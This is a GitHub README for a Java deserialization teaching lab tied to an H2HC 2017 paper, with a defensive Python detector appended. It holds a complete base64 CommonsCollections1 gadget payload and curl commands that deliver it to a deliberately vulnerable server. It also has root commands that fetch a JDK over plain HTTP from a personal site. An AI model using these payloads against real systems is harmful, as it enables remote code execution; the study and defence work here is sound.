joaomatosf / Javadeserh2hc

Licence: mit
Sample codes written for the Hackers to Hackers Conference magazine 2017 (H2HC).


Lab for Java Deserialization Vulnerabilities

This content is related to the paper written for the 12th edition of H2HC magazine. See the full paper at: https://www.h2hc.com.br/revista/

Slides and video of the talk will be available soon.

An overview of the fundamentals of native deserialization vulnerabilities in Java (JVM) environments

Content

The lab contains code samples that help you understand deserialization vulnerabilities and how gadget chains exploit them. The goal is to provide a better understanding so that you can develop new payloads and/or better design your environments.

There is also a vulnerable testing application (VulnerableHTTPServer.java), which helps you test your payloads.

Slides

[image: slides]

Examples (PoC's)

[image: PoC demonstration]

  • PoC Exploiting struts2-rest XStream Deserialization with Reverse Shell

[image: PoC demonstration]

Lab Usage Examples

First of all you need to read the full paper. Then review the sample codes and use the vulnerable testing application to understand how payloads work.

Getting JDK

If you don't want to go to the Oracle page and register, you can download the JDK directly from me at: http://www.joaomatosf.com/rnp/?prefix=rnp/java_files/

As root, run:

# cd /opt
# curl http://www.joaomatosf.com/rnp/java_files/jdk-8u20-linux-x64.tar.gz -o jdk-8u20-linux-x64.tar.gz 
# tar zxvf jdk-8u20-linux-x64.tar.gz
# rm -rf /usr/bin/java*
# ln -s /opt/jdk1.8.0_20/bin/j* /usr/bin
# java -version
  java version "1.8.0_20" 

Getting codes:

$ git clone https://github.com/joaomatosf/JavaDeserH2HC.git
$ cd JavaDeserH2HC

Compiling and executing the vulnerable web application:

$ javac VulnerableHTTPServer.java -XDignore.symbol.file
$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer
* =============================================================== *
*    Simple Java HTTP Server for Deserialization Lab v0.01        *
*    https://github.com/joaomatosf/JavaDeserH2HC                  *
* =============================================================== *
You can inject java serialized objects in the following formats:

 1) Binary in HTTP POST (ie \xAC\xED). Ex:
   $ curl 127.0.0.1:8000 --data-binary @ObjectFile.ser

 2) Base64 or Gzip+Base64 via HTTP POST parameters. Ex:
   $ curl 127.0.0.1:8000 -d "ViewState=H4sICAeH..."
   $ curl 127.0.0.1:8000 -d "ViewState=rO0ABXNy..."

 3) Base64 or Gzip+Base64 in cookies. Ex:
   $ curl 127.0.0.1:8000 -H "Cookie: JSESSIONID=H4sICAeH..."
   $ curl 127.0.0.1:8000 -H "Cookie: JSESSIONID=rO0ABXNy..."
   
 4) Base64 of AES-CBC encrypted with hardcoded Apache Shiro key. Ex:
   $ curl 127.0.0.1:8000 -H "Cookie: rememberMe=MTIzNDU2Nzg...
   
 5) XML for XStream RCE vulnerability/serialization. Ex:
   $ curl 127.0.0.1:8000 -d @file.xml
   
OBS: To test gadgets in specific libraries, run with -cp param. Ex:
$ java -cp .:commons-collections-3.2.1.jar VulnerableHTTPServer
==================================================================

JRE Version: 1.8.0_77
[INFO]: Listening on port 8000

Testing payloads

Compiling example 1, which works in applications with commons-collections 3.2.1 in the classpath and JRE < 8u72:

$ javac -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1.java

Generating payload:

$ java -cp .:commons-collections-3.2.1.jar ExampleCommonsCollections1 'touch /tmp/h2hc_2017'
Saving serialized object in ExampleCommonsCollections1.ser

Exploiting the vulnerable server:

Sending the payload in binary format via HTTP POST:

$ rm -rf /tmp/h2hc_2017
$ curl 127.0.0.1:8000/ --data-binary @ExampleCommonsCollections1.ser
Data deserialized!
$ ls -all /tmp/h2hc_2017
-rw-r--r-- 1 joao joao 0 Sep 13 22:34 /tmp/h2hc_2017

Sending the payload in Gzip+Base64 format via HTTP Cookies:

$ rm -rf /tmp/h2hc_2017
$ gzip ExampleCommonsCollections1.ser
$ base64 -w0 ExampleCommonsCollections1.ser.gz
$ curl 127.0.0.1:8000/ -H "cookie: JSESSIONID=H4sICMeVuVkAA0V4YW1wbGVDb21tb25zQ29sbGVjdGlvbnMxLnNlcgCVVD1MFEEUfrd3iKDEAxVNiITGqER2kZhIuEKRBCFZlCAS4hU67M3dLuzOrjOz5x0ohY0tBQmxUQut/EmMtYWxMBEl0UZDZ2HURBMtrHVmd+9uAf+44u7tzfu+933vvdn7X6GOUehhPlEpztvY4CoixOWIWy5R+6vhMCm6RhANIZKzMT334seO3cvzdxVQdNjuYGcK0wlk+5hx2KFPoyLSfG7Z2gjyMjqkeNnDHJrDAxuRgjZgI8YyJY9dBYAENMkTVUJUASlR2BP8IVOrykapWyq/P7Da8TI9sKxAQoeEyWF/jDTK1DbIlYUuwTyAcNvp0oKKPGSYWDVcx3EJE7+2BFoydpCn6mi2LHSQD4vXbpbTi0lZrD6PDO7SMofDuqDQQgototBiFNo4RYTlXeqElSn0/aNm3ieSm6kDJrIIzsUIup8vfTk4u5QShrPQZMVORKu7spuT4tMI8jcxcciTic7v747uvaEAlDwxqZQwk/lvM+KJI8JjhJPFheZ+5dFiML4Gq5LBoSU2xjNT04JLyC1SaK7twZhPuOVgqH0211u5FTOYxtRc//RzZu7KSq8CySzUWf20IHq6M7tRig7brBHMTTd3Gjl4rdqznFqkkMmKlFFEkTMudl3QtGR/s+2i/xF9aCmiX1iZvJVmh+xKlxUOjQXMI8MC1BIHhWT3Wt8+XH51vjoZ4NAgMKFKXy57u2QSLUzXoKHW29/u9M5mHp8MoMUgNbgdrQGsTcK8aih4t1hB5/5EGppYM5aAtG0daWK9+6hzD95MfPy8b+5UxUmSQ702ZRGNieutdAnqXdz1DbND446nmT2mcaGn+8gxDilcwkZVVSIoqrHKzgQvkyHETHGR6+pXnz5rvfg6CcogNNouyg0Gl3kYGrhJMTNdO1fyjp8I9V/eKr7SgZOSsNpeUxx7OY5hjomM1hiXEvp+AaGU2MlXBQAA"
Data deserialized!
$ ls -all /tmp/h2hc_2017
-rw-r--r-- 1 joao joao 0 Sep 13 22:47 /tmp/h2hc_2017
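The defender's counterpart to the input formats the lab server accepts (raw binary body, base64 or gzip+base64 in form parameters and cookies), as an added example that is not part of the JavaDeserH2HC lab or the paper: a Python inspector that recognises a Java serialization stream in each of those places, reads the class name of the top-level object from the stream header, and blocks anything outside an allowlist, which is the same policy a JEP 290 ObjectInputFilter enforces inside the JVM, applied here at the HTTP edge. The class names, the allowlist and the sample streams are constructed for the example; the Shiro AES-CBC cookie format and the XStream XML format are not covered because they are not plain serialization streams.

```python
"""Detect Java serialization streams in HTTP bodies, form parameters and cookies
and check the top-level class against an allowlist.
Added example, not part of the JavaDeserH2HC lab."""
import base64
import binascii
import gzip
import zlib

JAVA_MAGIC = b"\xac\xed\x00\x05"   # STREAM_MAGIC + STREAM_VERSION (base64: "rO0AB", gzip+base64: "H4sI")
GZIP_MAGIC = b"\x1f\x8b"
TC_OBJECT, TC_ARRAY, TC_CLASSDESC = 0x73, 0x75, 0x72

# Constructed allowlist: only this hypothetical application class may be deserialized.
ALLOWED_CLASSES = frozenset({"com.example.app.ViewState"})


def decode_candidate(value: bytes):
    """Return (encoding, stream) if value is a Java serialization stream in one of the
    encodings the lab server accepts (raw, base64, gzip+base64), otherwise None."""
    if value.startswith(JAVA_MAGIC):
        return ("binary", value)
    try:
        padded = value + b"=" * (-len(value) % 4)           # tolerate stripped padding
        decoded = base64.b64decode(padded, altchars=b"-_")   # standard or URL-safe alphabet
    except (binascii.Error, ValueError):
        return None
    if decoded.startswith(JAVA_MAGIC):
        return ("base64", decoded)
    if decoded.startswith(GZIP_MAGIC):
        try:
            inflated = gzip.decompress(decoded)
        except (OSError, EOFError, zlib.error):
            return None
        if inflated.startswith(JAVA_MAGIC):
            return ("gzip+base64", inflated)
    return None


def top_level_class(stream: bytes):
    """Class name of the first class descriptor: after the 4-byte header comes TC_OBJECT or
    TC_ARRAY, then TC_CLASSDESC, a 2-byte big-endian length and the UTF class name."""
    pos = len(JAVA_MAGIC)
    if pos < len(stream) and stream[pos] in (TC_OBJECT, TC_ARRAY):
        pos += 1
    if len(stream) < pos + 3 or stream[pos] != TC_CLASSDESC:
        return None
    name_len = int.from_bytes(stream[pos + 1:pos + 3], "big")
    name = stream[pos + 3:pos + 3 + name_len]
    return name.decode("utf-8", errors="replace") if len(name) == name_len else None


def make_stream(class_name: str) -> bytes:
    """Constructed sample: header, TC_OBJECT, TC_CLASSDESC and the class name, followed by
    eight zero bytes standing in for the serialVersionUID. Enough for the detector;
    it is not a complete, valid serialized object."""
    name = class_name.encode()
    return JAVA_MAGIC + bytes([TC_OBJECT, TC_CLASSDESC]) + len(name).to_bytes(2, "big") + name + b"\x00" * 8


def to_base64(stream: bytes) -> bytes:
    return base64.b64encode(stream)


def to_gzip_base64(stream: bytes) -> bytes:
    """Same transformation as the lab's `gzip` followed by `base64 -w0`."""
    return base64.b64encode(gzip.compress(stream))


def inspect_request(body: bytes, cookie_header: str = "", allowed=ALLOWED_CLASSES):
    """Scan the raw body, each form parameter and each cookie; return one finding per
    serialization stream found, with an allow/block verdict for its top-level class."""
    candidates = [("body", body)]
    if not body.startswith(JAVA_MAGIC) and b"=" in body:
        for pair in body.split(b"&"):                        # form-encoded, e.g. ViewState=rO0AB...
            key, _, value = pair.partition(b"=")
            if value:
                candidates.append((f"param:{key.decode('ascii', 'replace')}", value))
    for pair in cookie_header.split(";"):                    # e.g. JSESSIONID=H4sI...
        key, _, value = pair.strip().partition("=")
        if key:
            candidates.append((f"cookie:{key}", value.encode()))
    findings = []
    for where, value in candidates:
        hit = decode_candidate(value)
        if hit is None:
            continue
        encoding, stream = hit
        cls = top_level_class(stream)
        findings.append({"where": where, "encoding": encoding, "class": cls,
                         "verdict": "allow" if cls in allowed else "block"})
    return findings


if __name__ == "__main__":
    evil = make_stream("org.example.gadget.Transformer")     # constructed, not a real gadget class
    for f in inspect_request(b"", "JSESSIONID=" + to_gzip_base64(evil).decode() + "; theme=dark"):
        print(f)
```

`inspect_request` reports where the stream was found and which encoding hid it, so the same check serves as a detection signature in a proxy or WAF and as a pre-check before the application calls `ObjectInputStream.readObject`. The allowlist compares only the outermost class; nested classes inside the stream are still decided by the JVM-side filter, which is why this check complements a JEP 290 filter rather than replacing it.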